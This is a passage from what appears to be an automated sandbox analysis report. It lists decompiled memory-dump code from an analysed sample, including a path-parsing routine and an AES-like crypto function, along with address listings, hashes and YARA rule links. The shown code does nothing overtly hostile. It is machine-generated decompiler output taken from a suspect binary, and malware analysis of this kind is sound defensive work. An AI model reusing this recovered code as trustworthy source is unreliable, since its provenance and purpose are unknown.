															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E00A852A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E00A9EB70(1, 0xb779a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E00A9AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E00AC95D0();
																			L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E00ACB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E00AC3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E00ACB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                                    0x00aa4128
                                                                                                    0x00aa4135
                                                                                                    0x00aa413c
                                                                                                    0x00aa4141
                                                                                                    0x00aa4145
                                                                                                    0x00aa4147
                                                                                                    0x00aa414e
                                                                                                    0x00aa4151
                                                                                                    0x00aa4159
                                                                                                    0x00aa415c
                                                                                                    0x00aa4160
                                                                                                    0x00aa4164
                                                                                                    0x00aa4168
                                                                                                    0x00aa416c
                                                                                                    0x00aa417f
                                                                                                    0x00aa4181
                                                                                                    0x00aa446a
                                                                                                    0x00aa446a
                                                                                                    0x00aa418c
                                                                                                    0x00aa4195
                                                                                                    0x00aa4199
                                                                                                    0x00aa4432
                                                                                                    0x00aa4439
                                                                                                    0x00aa443d
                                                                                                    0x00aa4442
                                                                                                    0x00aa4447
                                                                                                    0x00000000
                                                                                                    0x00aa419f
                                                                                                    0x00aa41a3
                                                                                                    0x00aa41b1
                                                                                                    0x00aa41b9
                                                                                                    0x00aa41bd
                                                                                                    0x00aa45db
                                                                                                    0x00aa45db
                                                                                                    0x00000000
                                                                                                    0x00aa41c3
                                                                                                    0x00aa41c3
                                                                                                    0x00aa41ce
                                                                                                    0x00aa41d4
                                                                                                    0x00aee138
                                                                                                    0x00aee13e
                                                                                                    0x00aee169
                                                                                                    0x00aee16d
                                                                                                    0x00aee19e
                                                                                                    0x00aee16f
                                                                                                    0x00aee16f
                                                                                                    0x00aee175
                                                                                                    0x00aee179
                                                                                                    0x00aee18f
                                                                                                    0x00aee193
                                                                                                    0x00000000
                                                                                                    0x00aee199
                                                                                                    0x00000000
                                                                                                    0x00aee199
                                                                                                    0x00aee193
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa41da
                                                                                                    0x00aa41da
                                                                                                    0x00aa41df
                                                                                                    0x00aa41e4
                                                                                                    0x00aa41ec
                                                                                                    0x00aa4203
                                                                                                    0x00aa4207
                                                                                                    0x00aee1fd
                                                                                                    0x00aa4222
                                                                                                    0x00aa4226
                                                                                                    0x00aee1f3
                                                                                                    0x00aee1f3
                                                                                                    0x00aa422c
                                                                                                    0x00aa422c
                                                                                                    0x00aa4233
                                                                                                    0x00aee1ed
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa4239
                                                                                                    0x00aa4239
                                                                                                    0x00aa4239
                                                                                                    0x00aa4239
                                                                                                    0x00aa4233
                                                                                                    0x00aa4226
                                                                                                    0x00aa41ee
                                                                                                    0x00aa41ee
                                                                                                    0x00aa41f4
                                                                                                    0x00aa4575
                                                                                                    0x00aee1b1
                                                                                                    0x00aee1b1
                                                                                                    0x00000000
                                                                                                    0x00aa457b
                                                                                                    0x00aa457b
                                                                                                    0x00aa4582
                                                                                                    0x00aee1ab
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa4588
                                                                                                    0x00aa4588
                                                                                                    0x00aa458c
                                                                                                    0x00aee1c4
                                                                                                    0x00aee1c4
                                                                                                    0x00000000
                                                                                                    0x00aa4592
                                                                                                    0x00aa4592
                                                                                                    0x00aa4599
                                                                                                    0x00aee1be
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa459f
                                                                                                    0x00aa459f
                                                                                                    0x00aa45a3
                                                                                                    0x00aee1d7
                                                                                                    0x00aee1e4
                                                                                                    0x00000000
                                                                                                    0x00aa45a9
                                                                                                    0x00aa45a9
                                                                                                    0x00aa45b0
                                                                                                    0x00aee1d1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa45b6
                                                                                                    0x00aa45b6
                                                                                                    0x00aa45b6
                                                                                                    0x00000000
                                                                                                    0x00aa45b6
                                                                                                    0x00aa45b0
                                                                                                    0x00aa45a3
                                                                                                    0x00aa4599
                                                                                                    0x00aa458c
                                                                                                    0x00aa4582
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa41f4
                                                                                                    0x00aa423e
                                                                                                    0x00aa4241
                                                                                                    0x00aa45c0
                                                                                                    0x00aa45c4
                                                                                                    0x00000000
                                                                                                    0x00aa45ca
                                                                                                    0x00aa45ca
                                                                                                    0x00000000
                                                                                                    0x00aee207
                                                                                                    0x00aee20f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa45d1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aa45ca
                                                                                                    0x00000000
                                                                                                    0x00aa4247
                                                                                                    0x00aa4247
                                                                                                    0x00aa4247
                                                                                                    0x00aa4249
                                                                                                    0x00aa4249
                                                                                                    0x00aa4249
                                                                                                    0x00aa4251
                                                                                                    0x00aa4251
                                                                                                    0x00aa4257
                                                                                                    0x00aa425f
                                                                                                    0x00aa426e
                                                                                                    0x00aa4270
                                                                                                    0x00aa427a
                                                                                                    0x00aee219
                                                                                                    0x00aee219
                                                                                                    0x00aa4280
                                                                                                    0x00aa4282
                                                                                                    0x00aa4456
                                                                                                    0x00aa45ea
                                                                                                    0x00000000
                                                                                                    0x00aa45f0
                                                                                                    0x00aee223
                                                                                                    0x00000000
                                                                                                    0x00aee223
                                                                                                    0x00aa445c
                                                                                                    0x00aa445c
                                                                                                    0x00000000
                                                                                                    0x00aa445c
                                                                                                    0x00000000
                                                                                                    0x00aa4288
                                                                                                    0x00aa428c
                                                                                                    0x00aee298
                                                                                                    0x00aa4292
                                                                                                    0x00aa4292
                                                                                                    0x00aa429e
                                                                                                    0x00aa42a3
                                                                                                    0x00aa42a7
                                                                                                    0x00aa42ac
                                                                                                    0x00aee22d
                                                                                                    0x00aa42b2
                                                                                                    0x00aa42b2
                                                                                                    0x00aa42b9
                                                                                                    0x00aa42bc
                                                                                                    0x00aa42c2
                                                                                                    0x00aa42ca
                                                                                                    0x00aa42cd
                                                                                                    0x00aa42cd
                                                                                                    0x00aa42d4
                                                                                                    0x00aa433f
                                                                                                    0x00aa433f
                                                                                                    0x00aa42d6
                                                                                                    0x00aa42d6
                                                                                                    0x00aa42d9
                                                                                                    0x00aa42dd
                                                                                                    0x00aa42eb
                                                                                                    0x00aee23a
                                                                                                    0x00aa42f1
                                                                                                    0x00aa4305
                                                                                                    0x00aa430d
                                                                                                    0x00aa4315
                                                                                                    0x00aa4318
                                                                                                    0x00aa431f
                                                                                                    0x00aa4322
                                                                                                    0x00aa432e
                                                                                                    0x00aa433b
                                                                                                    0x00aa433b
                                                                                                    0x00000000
                                                                                                    0x00aa432e
                                                                                                    0x00aa42eb
                                                                                                    0x00aa434c
                                                                                                    0x00aa434e
                                                                                                    0x00aa4352
                                                                                                    0x00aa4359
                                                                                                    0x00aa435e
                                                                                                    0x00aa4361
                                                                                                    0x00aa436e
                                                                                                    0x00aa438a
                                                                                                    0x00aa438e
                                                                                                    0x00aa4396
                                                                                                    0x00aa439e
                                                                                                    0x00aa43a1
                                                                                                    0x00aa43ad
                                                                                                    0x00aa43bb
                                                                                                    0x00aa43bb
                                                                                                    0x00aa43ad
                                                                                                    0x00aa436e
                                                                                                    0x00aa43bf
                                                                                                    0x00aa43c5
                                                                                                    0x00aa4463
                                                                                                    0x00aa4463
                                                                                                    0x00aa43ce
                                                                                                    0x00aa43d5
                                                                                                    0x00aa43d9
                                                                                                    0x00aa43df
                                                                                                    0x00aa4475
                                                                                                    0x00aa4479
                                                                                                    0x00aa4491
                                                                                                    0x00aa4491
                                                                                                    0x00aa4479
                                                                                                    0x00aa43e5
                                                                                                    0x00aa43eb
                                                                                                    0x00aa43f4
                                                                                                    0x00aa43f6
                                                                                                    0x00aa43f9
                                                                                                    0x00aa43fc
                                                                                                    0x00aa43ff
                                                                                                    0x00aa44e8
                                                                                                    0x00aa44ed
                                                                                                    0x00aa44f3
                                                                                                    0x00aee247
                                                                                                    0x00000000
                                                                                                    0x00aa44f9
                                                                                                    0x00aa4504
                                                                                                    0x00aa4508
                                                                                                    0x00aa450f
                                                                                                    0x00aee269
                                                                                                    0x00000000
                                                                                                    0x00aa4515
                                                                                                    0x00aa4519
                                                                                                    0x00aa4531
                                                                                                    0x00aa4534
                                                                                                    0x00aa4537
                                                                                                    0x00aa453e
                                                                                                    0x00aa4541
                                                                                                    0x00aa454a
                                                                                                    0x00aee255
                                                                                                    0x00aee255
                                                                                                    0x00aee25b
                                                                                                    0x00aee25e
                                                                                                    0x00aee261
                                                                                                    0x00aee261
                                                                                                    0x00aa4555
                                                                                                    0x00aa4559
                                                                                                    0x00aa455d
                                                                                                    0x00aee26d
                                                                                                    0x00aee270
                                                                                                    0x00aee274
                                                                                                    0x00aee27a
                                                                                                    0x00aee27d
                                                                                                    0x00aee28e
                                                                                                    0x00aee28e
                                                                                                    0x00aa4563
                                                                                                    0x00aa4563
                                                                                                    0x00aa4569
                                                                                                    0x00aa4569
                                                                                                    0x00000000
                                                                                                    0x00aa455d
                                                                                                    0x00aa450f
                                                                                                    0x00000000
                                                                                                    0x00aa44f3
                                                                                                    0x00aa43ff
                                                                                                    0x00aa4405
                                                                                                    0x00aa4405
                                                                                                    0x00aa4405
                                                                                                    0x00aa42ac
                                                                                                    0x00aa428c
                                                                                                    0x00aa4282
                                                                                                    0x00aa4407
                                                                                                    0x00aa440d
                                                                                                    0x00aee2af
                                                                                                    0x00aee2af
                                                                                                    0x00aa4413
                                                                                                    0x00aa4413
                                                                                                    0x00000000
                                                                                                    0x00aa41d4
                                                                                                    0x00000000
                                                                                                    0x00aa41c3
                                                                                                    0x00aa41bd
                                                                                                    0x00aa4415
                                                                                                    0x00aa4415
                                                                                                    0x00aa4416
                                                                                                    0x00aa4417
                                                                                                    0x00aa4429
                                                                                                    0x00aa416e
                                                                                                    0x00aa416e
                                                                                                    0x00aa4175
                                                                                                    0x00aa4498
                                                                                                    0x00aa449f
                                                                                                    0x00aee12d
                                                                                                    0x00000000
                                                                                                    0x00aee133
                                                                                                    0x00000000
                                                                                                    0x00aee133
                                                                                                    0x00aa44a5
                                                                                                    0x00aa44a5
                                                                                                    0x00aa44aa
                                                                                                    0x00000000
                                                                                                    0x00aa44bb
                                                                                                    0x00aa44ca
                                                                                                    0x00aa44d6
                                                                                                    0x00aa44d7
                                                                                                    0x00aa44d8
                                                                                                    0x00aa44e3
                                                                                                    0x00aa44e3
                                                                                                    0x00aa44aa
                                                                                                    0x00aa417b
                                                                                                    0x00aa417b
                                                                                                    0x00aa417b
                                                                                                    0x00000000
                                                                                                    0x00aa417b
                                                                                                    0x00aa4175
                                                                                                    0x00000000

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1566c933f33985e335036767b426d0b8222336000c30e2707051b91d1d3c48ef
                                                                                                    • Instruction ID: 3f4a3c748e8f90f1222bf0879e9b820bf52849e167f0a7061a560e8e27b19737
                                                                                                    • Opcode Fuzzy Hash: 1566c933f33985e335036767b426d0b8222336000c30e2707051b91d1d3c48ef
                                                                                                    • Instruction Fuzzy Hash: B3F169706082518BCB24CF59C480A7AB7F1EFDA714F15892EF88ACB290E774DD85DB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00432FB0, Relevance: .4, Instructions: 435COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 26%
                                                                                                    			E00432FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                                                                                    0x00432fb0
                                                                                                    0x00432fbf
                                                                                                    0x00432fc8
                                                                                                    0x00432fd6
                                                                                                    0x00432fda
                                                                                                    0x00432fe3
                                                                                                    0x00432ff4
                                                                                                    0x00432ff7
                                                                                                    0x00432ffc
                                                                                                    0x00433005
                                                                                                    0x00433013
                                                                                                    0x00433018
                                                                                                    0x00433021
                                                                                                    0x00433031
                                                                                                    0x00433051
                                                                                                    0x00433054
                                                                                                    0x00433066
                                                                                                    0x0043306b
                                                                                                    0x00433080
                                                                                                    0x0043309d
                                                                                                    0x004330a0
                                                                                                    0x004330b1
                                                                                                    0x004330c6
                                                                                                    0x004330e6
                                                                                                    0x004330e9
                                                                                                    0x004330fb
                                                                                                    0x00433119
                                                                                                    0x00433136
                                                                                                    0x00433139
                                                                                                    0x0043314b
                                                                                                    0x00433160
                                                                                                    0x00433166
                                                                                                    0x0043316e
                                                                                                    0x0043316f
                                                                                                    0x00433172
                                                                                                    0x00433180
                                                                                                    0x00433190
                                                                                                    0x004331a2
                                                                                                    0x004331b4
                                                                                                    0x004331d0
                                                                                                    0x004331e3
                                                                                                    0x004331f0
                                                                                                    0x00433201
                                                                                                    0x00433218
                                                                                                    0x0043323a
                                                                                                    0x0043323d
                                                                                                    0x0043324e
                                                                                                    0x00433269
                                                                                                    0x00433280
                                                                                                    0x00433283
                                                                                                    0x00433295
                                                                                                    0x0043329d
                                                                                                    0x004332b2
                                                                                                    0x004332cf
                                                                                                    0x004332d2
                                                                                                    0x004332e3
                                                                                                    0x00433307
                                                                                                    0x00433317
                                                                                                    0x0043331a
                                                                                                    0x0043332c
                                                                                                    0x00433344
                                                                                                    0x00433347
                                                                                                    0x0043335a
                                                                                                    0x00433367
                                                                                                    0x00433379
                                                                                                    0x00433391
                                                                                                    0x004333b4
                                                                                                    0x004333b7
                                                                                                    0x004333c9
                                                                                                    0x004333de
                                                                                                    0x004333e4
                                                                                                    0x004333e4
                                                                                                    0x004333e7
                                                                                                    0x004333e7
                                                                                                    0x00433180
                                                                                                    0x0043344b
                                                                                                    0x00433454
                                                                                                    0x00433462
                                                                                                    0x004334c0
                                                                                                    0x004334c9
                                                                                                    0x004334d7
                                                                                                    0x00433539
                                                                                                    0x00433542
                                                                                                    0x0043354f
                                                                                                    0x00433552
                                                                                                    0x0043359e
                                                                                                    0x004335aa
                                                                                                    0x004335b3
                                                                                                    0x004335c0
                                                                                                    0x004335c7

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                    • Instruction ID: 98010a3575b3cc3b423380c76c29343f8ce876da39154f205a4ea9a6ae7d2dcb
                                                                                                    • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                    • Instruction Fuzzy Hash: 61026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AB20A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 92%
                                                                                                    			E00AB20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
